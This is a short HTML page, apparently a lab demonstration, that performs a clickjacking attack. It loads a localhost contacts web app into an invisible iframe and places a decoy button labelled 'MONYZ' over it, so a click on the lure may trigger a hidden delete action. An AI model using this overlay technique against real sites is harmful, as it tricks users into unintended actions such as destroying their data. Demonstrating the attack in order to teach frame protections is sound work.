<!DOCTYPE html>
<html>
<head lang="en">
    <meta charset="UTF-8">
    <title>Clickjacking Attack to Unsecured Webapp (8080) </title>
    <style type="text/css">
        .hidden-frame{
            height: 50px;
            opacity: 0;
        }
        .overlap-btn{
            position: fixed;
            left: 140px;
            top: 25px;
        }
    </style>
</head>
<body>

    <button class="overlap-btn" ng-click="delete(contactId)">MONYZ</button>

    <iframe class="hidden-frame" src="http://localhost:8080/contacts" frameborder="0" seamless="seamless" scrolling="no"></iframe>

</body>
</html>